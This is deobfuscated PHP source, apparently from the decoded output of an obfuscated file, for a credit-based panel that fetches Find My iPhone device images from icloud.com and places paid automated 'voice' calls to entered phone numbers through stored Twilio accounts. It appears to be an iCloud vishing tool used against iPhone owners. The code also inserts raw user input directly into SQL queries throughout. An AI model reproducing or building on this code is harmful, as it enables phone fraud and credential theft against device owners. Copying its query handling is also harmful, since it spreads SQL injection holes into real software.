if (isset($_SESSION["admin"])) { if ($_SESSION["admin"] != "admin") { header("location: https://{$_SERVER["SERVER_NAME"]}/mainte.php"); die; } } } else { if ($info["status"] == "OFF" && isset($_SESSION["loggedin"])) { } } goto pil76; zPnXO: if (isset($_SESSION["username"])) { if (isset($_POST["Data"])) { switch ($_POST["Data"]) { case "ChangeColor": $model = $_POST["Model"]; $brand = "Watch"; if (strpos($model, "iPhone") !== false) { $brand = "iPhone"; } elseif (strpos($model, "iPad") !== false) { $brand = "iPad"; } else { $brand = "Watch"; } $screen = $_POST["Screen"]; $back = $_POST["Back"]; $url = "https://statici.icloud.com/fmipmobile/deviceImages-9.0/{$brand}/{$model}-{$screen}-{$back}-0/online-infobox__3x.png"; if ($screen == "default") { $url = "https://statici.icloud.com/fmipmobile/deviceImages-9.0/{$brand}/{$model}/online-infobox__3x.png"; } $img = generateImg($url); die(json_encode(array("Image" => $img))); break; case "GetAddress": $Address = $_POST["Address"]; $response = WEBREQUEST("https://maps.googleapis.com/maps/api/geocode/json?address=" . rawurlencode($Address) . "&key={$GLOBALS["googleAPI"]}"); $json = json_decode($response); $results = $json->results; $lat = ''; $lng = ''; $status = $json->status; if (count($results) > 0) { $lat = $json->results[0]->geometry->location->lat; $lng = $json->results[0]->geometry->location->lng; } $msg = $status != "OK" ? "alert('Address incorrect! Please try again.')" : "alert('Address verified!')"; die(json_encode(array("Response" => $msg, "Location" => "{$lat}|{$lng}"))); break; default: break; } } else { if (isset($_POST["ORDERVOICE"])) { $ORDERVOICE = $_POST["ORDERVOICE"]; $NUMBER = $_POST["NUMBER"]; $MODEL = $_POST["MODEL"]; $VOICE = $_POST["VOICE"]; $NOTE = $_POST["NOTE"]; $SERVICE = $_POST["SERVICE"]; $SERVER = $_POST["SERVER"]; $username = $_SESSION["username"]; $DATE = CurrentDate(); $query2 = mysqli_query($connect, "SELECT * FROM `twilio` WHERE `name` = '{$SERVER}'"); $fetch2 = mysqli_fetch_array($query2); $POST["token"] = Encrypt($fetch2["token"]); $POST["sid"] = Encrypt($fetch2["sid"]); $POST["ownernum"] = Encrypt($fetch2["number"]); $POST["run"] = Encrypt("ordervoice"); $POST["REPORT"] = $_SERVER["HTTP_HOST"]; $POST["NUMBER"] = $NUMBER; $POST["MODEL"] = $MODEL; $POST["VOICE"] = $VOICE; $POST["SERVICE"] = $SERVICE; $POST["DATE"] = $DATE; $query = mysqli_query($connect, "SELECT * FROM `users` WHERE `username` = '{$_SESSION["username"]}'"); $fetch = mysqli_fetch_array($query); $query1 = mysqli_query($connect, "SELECT * FROM `service` WHERE `name` = 'voice'"); $fetch1 = mysqli_fetch_array($query1); $amount = $fetch1["amount"]; $credit = $fetch["balance"]; if ($amount > $credit) { die("Toastr('Credits not enough!\xa
Amount: {$amount}\xa\xaCredits Left: {$credit}','','warning');"); } else { if ($credit >= $amount) { $device = mysqli_fetch_array(mysqli_query($connect, "SELECT * FROM `devicess` WHERE `name` = '{$MODEL}'")); $DEVICE = $device["models"]; mysqli_query($link, "INSERT INTO `voice-history` (`server`, `username`, `service`, `model`, `voice`, `number`, `note`, `date`) VALUES('{$SERVER}','{$username}','{$SERVICE}','{$DEVICE}','{$VOICE}','{$NUMBER}','{$NOTE}','{$DATE}')"); $check = voicerequest($POST); try { if (str_contains($check, "balik")) { $re = str_replace("balik: ", '', $check); $reply = "Unauthorized account! error {$re}"; die("Toastr('{$reply}','','warning');"); } $a = json_decode($check, true); $result = $a["Result"]; if ($result == "Error") { die("Toastr('Phone carrier cannot verify. Make sure you enter correct number.<br>#{$a["Reason"]}','','error')"); } if ($result == "ApiError") { $reason = $a["Reason"]; if (strpos($reason, "[HTTP 401]") !== false) { $message = "\xe2\x9a\240 WRONG API ACCOUNT! \342\232\240\xa\xa"; $message .= "\xf0\x9f\221\256\xf0\x9f\217\xbe Position: {$fetch["position"]}\xa
"; $message .= "\xf0\237\x91\250\xe2\x80\215\xf0\237\222\xbb Username: {$username}
\xa"; $message .= "\360\237\x94\x97 Domain: {$domain}

"; $message .= "\360\x9f\223\241 IP: {$ip}\xa\xa"; $message .= "\360\x9f\x96\xa5 Browser: {$user_agent}\xa
"; $message .= "SID: {$fetch2["sid"]}\xa
"; $message .= "API Response: {$reason}\xa\xa"; $message .= "\xf0\x9f\222\xa5 Admin: @khenserver \360\x9f\x92\xa5"; BotMessage($message); $reply = "Invalid API Account! Please contact administrator."; die("Toastr('Invalid API Account! Please contact administrator.','','info')"); } else { if (strpos($reason, "[HTTP 404]") !== false) { die("Toastr('Phone carrier cannot verify. Make sure you enter correct number.<br>INCORRECT NUMBER.','','error')"); } else { $return = str_replace("Twilio", "{$TELE_USERNAME}", $reason); $return = str_replace("'", """, $return); die("Toastr('API Account has problem! Please contact administrator.<br> Error: {$return}','','warning')"); } } return; } else { if ($result == "Success") { $query = mysqli_query($connect, "SELECT * FROM `users` WHERE `username` = '{$_SESSION["username"]}'"); $fetch = mysqli_fetch_array($query); $query1 = mysqli_query($connect, "SELECT * FROM `service` WHERE `name` = 'voice'"); $fetch1 = mysqli_fetch_array($query1); $amount = $fetch1["amount"]; $credit = $fetch["balance"]; if ($credit >= $amount) { $sid = $a["Sid"]; $newbal = $credit - $amount; mysqli_query($connect, "UPDATE `users` SET `balance` = '{$newbal}' WHERE `username` = '{$_SESSION["username"]}'"); $query = mysqli_query($connect, "UPDATE `voice-history` SET `csid`='{$sid}' WHERE `date` = '{$DATE}'"); die("Toastr('Call {$a["Carrier"]} Order success! Your order status can be check in Order History','','success')"); } } } } catch (Exception $e) { $message = "\342\x9a\240 API ERROR SERVER! \xe2\232\xa0\xa\xa"; $message .= "API Response: {$check}
\xa"; $message .= "\360\237\x92\xa5 Admin: @khenserver \xf0\x9f\222\xa5"; BotMessage($message); $reply = "Invalid API Response! Please contact administrator."; die("Toastr('Invalid API Response! Please contact administrator.','','error')"); } return; } } die("Success"); } else { if (isset($_POST["REDIAL"])) { $json = explode(":", $_POST["REDIAL"]); $NUMBER = $json[0]; $DATE = str_replace("DATE=", '', urldecode($json[1])); $username = $_SESSION["username"]; $query = mysqli_query($connect, "SELECT * FROM `users` WHERE `username` = '{$username}'"); $fetch = mysqli_fetch_array($query); $query1 = mysqli_query($connect, "SELECT * FROM `service` WHERE `name` = 'voice'"); $fetch1 = mysqli_fetch_array($query1); $credit = $fetch["balance"]; $amount = $fetch1["amount"]; if ($amount > $credit) { die("Toastr('Credits not enough!

Amount: {$amount}
\xaCredits Left: {$credit}','','warning');"); } else { if ($credit >= $amount) { $infos = mysqli_fetch_array(mysqli_query($connect, "SELECT * FROM `voice-history` WHERE `date` = '{$DATE}'")); $device = mysqli_fetch_array(mysqli_query($connect, "SELECT * FROM `devicess` WHERE `models` = '{$infos["model"]}'")); $MODEL = $device["name"]; $VOICE = $infos["voice"]; $SERVICE = $infos["service"]; $SERVER = $infos["server"]; $query2 = mysqli_query($connect, "SELECT * FROM `twilio` WHERE `name` = '{$SERVER}'"); $fetch2 = mysqli_fetch_array($query2); $POST["token"] = Encrypt($fetch2["token"]); $POST["sid"] = Encrypt($fetch2["sid"]); $POST["ownernum"] = Encrypt($fetch2["number"]); $POST["run"] = Encrypt("ordervoice"); $POST["NUMBER"] = $NUMBER; $POST["MODEL"] = $MODEL; $POST["VOICE"] = $VOICE; $POST["SERVICE"] = $SERVICE; $POST["DATE"] = $DATE; $POST["REPORT"] = $_SERVER["HTTP_HOST"]; $query = mysqli_query($connect, "SELECT * FROM `users` WHERE `username` = '{$_SESSION["username"]}'"); $fetch = mysqli_fetch_array($query); $query1 = mysqli_query($connect, "SELECT * FROM `service` WHERE `name` = 'voice'"); $fetch1 = mysqli_fetch_array($query1); $amount = $fetch1["amount"]; $credit = $fetch["balance"]; try { $check = voicerequest($POST); if (str_contains($check, "balik")) { $re = str_replace("balik: ", '', $check); $reply = "Unauthorized account! error {$re}"; return $reply; } $a = json_decode($check, true); $result = $a["Result"]; if ($result == "Error") { die("Toastr('Phone carrier cannot verify. Make sure you enter correct number.<br>#{$a["Reason"]}','','error');"); } if ($result == "ApiError") { $reason = $a["Reason"]; if (strpos($reason, "[HTTP 401]") !== false) { $message = "\xe2\232\xa0 WRONG API ACCOUNT! \xe2\232\xa0\xa\xa"; $message .= "\xf0\x9f\x91\256\xf0\x9f\217\xbe Position: {$fetch["position"]}\xa
"; $message .= "\xf0\237\x91\250\xe2\200\x8d\xf0\237\x92\273 Username: {$username}\xa\xa"; $message .= "\360\x9f\224\227 Domain: {$domain}\xa\xa"; $message .= "\xf0\x9f\223\241 IP: {$ip}\xa
"; $message .= "\360\237\226\xa5 Browser: {$user_agent}
\xa"; $message .= "SID: {$fetch2["sid"]}\xa
"; $message .= "API Response: {$reason}

"; $message .= "\360\237\x92\xa5 Admin: @khenserver \xf0\x9f\222\xa5"; BotMessage($message); $reply .= "Invalid API Account! Please contact administrator."; die("Toastr('Invalid API Account! Please contact administrator.','','error');"); } else { if (strpos($reason, "[HTTP 404]") !== false) { $reply .= "Phone carrier cannot verify. Make sure you enter correct number.<br>INCORRECT NUMBER."; die("Toastr('Phone carrier cannot verify. Make sure you enter correct number.<br>INCORRECT NUMBER.','','error');"); } else { $return = str_replace("Twilio", "{$TELE_USERNAME}", $reason); $return .= str_replace("'", """, $return); $reply .= "API Account has problem! Please contact administrator.<br> Error: {$return}"; die("Toastr('API Account has problem! Please contact administrator.<br> Error: {$return}','','error');"); } } } else { if ($result == "Success") { $query = mysqli_query($connect, "SELECT * FROM `users` WHERE `username` = '{$_SESSION["username"]}'"); $fetch = mysqli_fetch_array($query); $query1 = mysqli_query($connect, "SELECT * FROM `service` WHERE `name` = 'voice'"); $fetch1 = mysqli_fetch_array($query1); $amount = $fetch1["amount"]; $credit = $fetch["balance"]; if ($credit >= $amount) { $sid = $a["Sid"]; $newbal = $credit - $amount; mysqli_query($connect, "UPDATE `users` SET `balance` = '{$newbal}' WHERE `username` = '{$_SESSION["username"]}'"); $query = mysqli_query($connect, "UPDATE `voice-history` SET `csid`='{$sid}' WHERE `date` = '{$DATE}'"); $reply = "Redial {$a["Carrier"]} Order success! Your order status can be check in Order History"; die("Toastr('Redial {$a["Carrier"]} Order success! Your order status can be check in Order History','','success');"); return $reply; } } } } catch (Exception $e) { $message = "\342\232\240 API ERROR SERVER! \342\x9a\240
\xa"; $message .= "API Response: {$check}\xa\xa"; $message .= "\xf0\237\222\245 Admin: @khenserver \360\x9f\222\xa5"; BotMessage($message); $reply = "Invalid API Response! Please contact administrator."; die("Toastr('{$reply}','','error');"); } return; } } return; } } } } goto AI1oc; IuSEz: $ErrorAlert = array(); goto UCWZ1; vwRNq: $debugging = false; goto lvTfg; WDvBl: function BotMessage($message) { if (!LOCAL) { $currentdate = CurrentDate(); file_put_contents("Error({$currentdate})", $message); } } goto K3PpL; uLq_L: define("DB_SERVER", "localhost"); goto n8vHs; K3PpL:  ?>

Function Calls

None

Variables

None

Stats

MD5 274bd7af3e6f644f92c03bde06b955e0
Eval Count 0
Decode Time 45 ms